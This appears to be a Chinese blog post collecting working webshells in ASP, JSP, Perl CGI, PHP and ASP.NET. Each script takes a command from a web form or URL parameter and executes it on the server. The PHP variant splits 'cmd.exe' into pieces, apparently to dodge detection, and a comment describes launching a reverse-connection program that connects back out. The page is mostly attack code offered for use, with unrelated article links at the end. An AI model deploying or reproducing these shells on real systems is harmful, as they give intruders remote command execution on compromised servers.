cmd1.asp

<object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=shell scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<% end if %>

<form method="post">

<input type=text name="cmdx" size= value="C:\Documents and Settings\All Users\cmd.exe"><br>

<input type=text name="cmd" size= value="<%=request.form("cmd")%>"><br>

<input type=submit value="cmd命令"></form>

<textarea readonly cols= rows=>

<%On Error Resume Next

if request.form("cmdx")="C:\Documents and Settings\All Users\cmd.exe" then

response.write shell.exec("cmd.exe /c"&request.form("cmd")).stdout.readall

end if

response.write shell.exec(request.form("cmdx")&" /c"&request.form("cmd")).stdout.readall

%>

</textarea>

cmd2.asp

<center><%response.write "<font size=4 color=red>shellapplication执行命令 无回显</font>" %>

<BR>程序所在的物理路径:

<%response.write request.servervariables("APPL_PHYSICAL_PATH")%> </center>

<html><title>shellapplication执行命令 by kyo327 </title>

<body><br/><center>

<form action="<%= Request.ServerVariables("URL") %>" method="POST">

<br>程序路径:<br/>

<input type=text name=text1 size= value="C:\Documents and Settings\All Users\Documents\cmd.exe"> <br/>

参数:<br/><input type=text name=text2 size= value="<%=canshu%>"><br/>

<input type=submit name=makelove value=运行>

</form> </center></body> </html>

<%

appnames = Request.Form("text1")

canshu = Request.Form("text2")

if appnames<>"" then

set kyoshell=createobject("shell.application")

kyoshell.ShellExecute appnames,canshu,"","open",

response.write "<center>执行成功!</center>"

end if

%>

cmd.jsp

<%@ page import="java.io.*" %>

<%

    try {

            String cmd = request.getParameter("cmd");

            Process child = Runtime.getRuntime().exec(cmd);

            InputStream in = child.getInputStream();

            int c;

            while ((c = in.read()) != -1) {

                out.print((char)c);

            }

            in.close();

            try {

                child.waitFor();

            } catch (InterruptedException e) {

                e.printStackTrace();

            }

        } catch (IOException e) {

            System.err.println(e);

        }

%>

cmd.cgi

#!/usr/bin/perl

read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});

($key,$command)=split(/=/,$POST);

$command=~s/%([a-fA-f0-][a-fA-f0-])/pack("C",hex($))/eg;

$command=~s/\+/ /;

$output=system "$command>a.txt";

$output=~s/\n/\<br\>/;

print "Content-Type: text/html\n\n";

print <<EOF;

<form action="" method=POST>

<input type=text size= name=command value=""><br>

<input type=submit value=ok>

</form>

EOF

open(OUTPUT,"a.txt")||die "cannot open $!";

@output=<OUTPUT>;

print <<EOF;

<textarea name="textfield" cols="80" rows="60">@output</textarea>

EOF

close OUTPUT;

unlink ("a.txt");

exit;

cmd.cfm

#!/usr/bin/perl

read(STDIN,$POST,$ENV{'CONTENT_LENGTH'});

($key,$command)=split(/=/,$POST);

$command=~s/%([a-fA-f0-][a-fA-f0-])/pack("C",hex($))/eg;

$command=~s/\+/ /;

$output=system "$command>a.txt";

$output=~s/\n/\<br\>/;

print "Content-Type: text/html\n\n";

print <<EOF;

<form action="" method=POST>

<input type=text size= name=command value=""><br>

<input type=submit value=ok>

</form>

EOF

open(OUTPUT,"a.txt")||die "cannot open $!";

@output=<OUTPUT>;

print <<EOF;

<textarea name="textfield" cols="80" rows="60">@output</textarea>

EOF

close OUTPUT;

unlink ("a.txt");

exit;

cmd1.php

<?php

        if (key($_GET)=="system") {

            system($_GET['system']);

        } elseif (key($_GET)=="passthru") {

            passthru($_GET['passthru']);

        } elseif (key($_GET)=="exec") {

            $result = exec($_GET['exec']);

            echo $result;

        } elseif (key($_GET)=="shell_exec") {

            $result=shell_exec($_GET['shell_exec']);

            echo $result;

        } elseif (key($_GET)=="popen") {

            $pp = popen($_GET['popen'], 'r');

            $read = fread($pp, 2096);

            echo $read;

            pclose($pp);

        } elseif (key($_GET)=="wscript") {

            $wsh = new COM('WScript.shell') or die("PHP Create COM wscript.shell failed");

            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_GET['wscript']."");

            $stdout = $exec->StdOut();

            $stroutput = $stdout->ReadAll();

            echo $stroutput;

        } elseif(key($_GET)=="proc_open"){

$descriptorspec = array(

   0 => array("pipe", "r"),

   1 => array("pipe", "w"),

   2 => array("pipe", "w")

);

$process = proc_open("C:\\Docume~1\\alluse~1\\Documents\\cmd.exe", $descriptorspec, $pipes);

if (is_resource($process)) {

    fwrite($pipes[0], "".$_GET['proc_open']."\r\n");

    fwrite($pipes[0], "exit\r\n");

    fclose($pipes[0]);

    while (!feof($pipes[1])) {

        echo fgets($pipes[1], 1024);

    }

    fclose($pipes[1]);

    while (!feof($pipes[2])) {

        echo fgets($pipes[2], 1024);

      }

    fclose($pipes[2]);

    proc_close($process);

}}

?>

cmd2.php

<?php

$wsh = new COM('Shell.Application') or die("Shell.Application");

$exec = $wsh->open("C:\\Docume~1\\alluse~1\\Documents\\fanlian.exe");

//没有回显,多了个fanlian进程,可以直接执行一个反向连接程序反弹回来

?>

cmd1.aspx

<%@ Page Language="c#" validateRequest = "false" aspcompat = "true" %>

<html xmlns="http://www.w3.org/1999/xhtml" >

<head id="Head1" runat="server">

<title>cmdshell</title></head>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<script language="C#" runat="server">

  void Button_Click1(object sender, EventArgs e)

    {

        try

        {

            Process shell = new Process();

            shell.StartInfo.FileName = PathTextBox.Text;

            shell.StartInfo.Arguments = ShellTextBox.Text;

            shell.StartInfo.UseShellExecute = false;

            shell.StartInfo.RedirectStandardInput = true;

            shell.StartInfo.RedirectStandardOutput = true;

            shell.StartInfo.RedirectStandardError = true;

            shell.Start();

            string str1 = shell.StandardOutput.ReadToEnd();

            str1 = str1.Replace("<", "&lt;");

            str1 = str1.Replace(">", "&gt;");

            myLabel.Text = "<hr><pre>" + str1 + "</pre>";

        }

        catch (Exception Error)

        {

            Bin_Error(Error.Message);

        }

    }

</script>

<body>

<center><font size= color=red>asp.net命令执行 by kyo</font><br /></center>

<form id="form1" runat="server"><div style="text-align: center">

<asp:Panel ID="CmdPanel" runat="server" Height="50px" Width="800px"><hr />

程序路径 :<asp:TextBox ID="PathTextBox" runat="server" Width="395px">C:\Documents and Settings\All Users\Documents\cmd.exe</asp:TextBox><br />

命令参数 :<asp:TextBox ID="ShellTextBox" runat="server" Width="395px">/c ver</asp:TextBox><br />

<asp:Button ID="RunButton" runat="server" OnClick="Button_Click1" Text="运行" /></div>

<div style="text-align: left">

<asp:Label ID="myLabel" runat="server" EnableViewState="False"></asp:Label></div>

<hr /></asp:Panel></form></body>

</html>

cmd2.aspx

<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" Debug="true"%>

<script runat="server">

sub run(Src As Object, E As EventArgs)

         Dim StrResult As String

         Dim shell As Object

         shell = Server.CreateObject("WScript.Shell")

         StrResult = shell.exec( path.Text & " /c " & box.Text ).stdout.readall

         StrResult =  Replace(StrResult , "<","&lt;")

         StrResult =  Replace(StrResult , ">","&gt;")

         ResultLabel.Text = "<pre>" & StrResult & "</pre>"

end sub

</script>

<html><head></head><body>

<form runat="server">

程序路径:<asp:TextBox ID="path" Width="" Text="C:\Documents and Settings\All Users\Documents\cmd.exe"

runat="server" />

<br>命令参数:<asp:TextBox ID="box" Width="" runat="server" />

<asp:Button ID="Button" Text="Run" OnClick="run" runat="server" /><br>

<asp:Label ID="ResultLabel" runat="server" />

</form></body></html>

cmd3.aspx

<!--

Titel:  shell.application

Author: kyo327

Date:  --

-->

<%@ Page Language="VB" validateRequest = "false" aspcompat = "true" %>

<script runat="server">

sub run(Src As Object, E As EventArgs)

        Dim appName As String

        Dim appArgs As String

        Dim love As Object

        love = Server.CreateObject("Shell.Application")

        appName = appnames.Text

        appArgs = canshu.Text

        love.ShellExecute(appName, appArgs, "", "open", )

end sub

</script><html>

<head><title>shellapplication For ASP.NET By kyo327</title></head>

<body><form id="Form1" runat="server">

<center><font color=red size=>利用shell.application执行命令for asp.net</font><br />

<br>程序路径名:<br />

<asp:TextBox ID="appnames" Width="" Text="C:\Documents and Settings\All Users\Documents\cmd.exe" runat="server" />  <br>参数:<br />

<asp:TextBox ID="canshu" Width="" runat="server" /> <br /><br />

<asp:Button ID="Button" Text="运行" OnClick="run" runat="server" /><br>

</form></center></body></html>

webshell下执行命令脚本汇集的更多相关文章

  1. 在shell下执行命令的方法

    在shell下执行命令的方法 1. #!/bin/sh 语法:在shell.sh的开头写入 #!/bin/sh 一般的shell脚本就是这种用法.这种方法调用脚本开头的shell执行命令,子shell ...

  2. expect实现远程主机自动执行命令脚本

    2014年第一个脚本,哈哈!!! expect实现远程主机自动执行命令脚本: #!/usr/bin/expect -- if { [llength $argv] < 4 } { puts &qu ...

  3. MySQL命令行下执行.sql脚本详解

    本文主要介绍一个在MySQL命令行下执行脚本文件的例子,通过这个例子让我们来了解一下在命令行下MySQL是怎样执行脚本的吧.现在我们开始介绍这一过程. 1.首先编写sql脚本,保存为的:book.sq ...

  4. Linux 下执行Shell 脚本的方式

    Shell 脚本的执行方式通常有如下三种: (1)bash script-name 或者 sh script-name:(2)path/script-name或者./script-name:(3)so ...

  5. 解决方法:loadrunner 场景下执行webservice脚本是---报错10492 Error: Exception was raised when calling per-process-init function in extens

    在vug下执行时,脚本无异常,但是在controller下执行时报下面错误,网上查了下,解决方法千奇百怪,但无一可行. 分析了下错误,似乎是初始化进程有关.想到rts中的设置习惯时以线程方式执行. 遂 ...

  6. 在Linux下执行Jmeter脚本

    前言 Jmeter这款接口测试工具,已经在越来越多的公司被要求会使用了. 而且,现在应该部分小伙伴们都开始用起来了. 但是,你们知道除了在Windows用图形化界面的Jmeter执行脚本之外,还有其他 ...

  7. 曲演杂坛--SQLCMD下执行命令失败但没有任何错误提示的坑

    今天使用SQLCMD导入到SQL SERVER数据库中,看着数据文件都成功执行,但是意外发现有一个文件数据没有成功导入,但执行不报错,很容易导致问题被忽略. 使用存在问题的文件做下测试,从界面上看几行 ...

  8. shell中使用expect命令进行远程执行命令脚本

    expect是用来实现自动交互功能的工具之一,使用expect-send来实现交互过程. 注意: 1.脚本的执行方法与bash shell不一样,比如:expect example.sh 2.向一个脚 ...

  9. linux下执行sh脚本,提示Command not found解决办法

    1.确保用户对文件有读写及执行权限 oracle@linux-106:~/RMAN/bin> chmod a+x test.sh 2.然后修改文件格式(如果是从winodws搬过来的会显示dos ...

随机推荐

  1. Understanding Kafka Consumer Groups and Consumer Lag

    In this post, we will dive into the consumer side of this application ecosystem, which means looking ...

  2. 【转】清理Kylin的中间存储数据(HDFS & HBase Tables)

    http://blog.csdn.net/jiangshouzhuang/article/details/51290399 Kylin在创建cube过程中会在HDFS上生成中间数据.另外,当我们对cu ...

  3. ROC曲线绘制

    ROC 曲线绘制 个人的浅显理解:1.ROC曲线必须是针对连续值输入的,通过选定不同的阈值而得到光滑而且连续的ROC曲线,故通常应用于Saliency算法评价中,因为可以选定0~255中任意的值进行阈 ...

  4. psql-03数据类型(1)

    PostgreSQL支持的数据类型远比其他数据库要多; 类型输入与转换 select int '1', date '2015-12-6'; select '1'::int, '2015-12-6':: ...

  5. 分享Kali Linux 2016.2第47周镜像

    分享Kali Linux 2016.2第47周镜像Kali Linux官方于11月20日发布Kali Linux 2016.2的第47周镜像.这次发布仍然包含11个镜像文件.其中,不仅包含Gnome桌 ...

  6. Delphi 2009 泛型容器单元(Generics.Collections)[1]: TList<T>

    Delphi 2009 新增了泛型容器单元: Generics.Collections, 同时还有一个 Generics.Defaults 单元做支持. Generics.Collections 包含 ...

  7. jQuery跨域

    其实jQuery跨域很简单很简单,你记住格式就好,跨域的原理请参考 <jsonp跨域> jQuery跨域代码: $.ajax({ url:'https://suggest.taobao.c ...

  8. iOS学习04C语言数组

    1.一维数组 数组:具有相同类型的成员组成的一组数据 1> 定义 元素:数组中存放的数据成为数组的元素     数组是构造类型,用{...}来给构造类型赋初始值,类型修饰符用来表示元素的类型 类 ...

  9. BZOJ 1412 & 最小割

    什么时候ZJ省选再现一次这么良心的题吧... 题意: 在一个染色的格子画分割线,使其不想连,求最少的线段 SOL: 裸裸的最小割.题目要求两种颜色不想连,我们把他分到两个集合,也就是把所有相连的边切断 ...

  10. select 支持宽高(高度有兼容问题);

    <select size=1(默认) size=2 没有下拉效果> <option selected>12</option> <option selected ...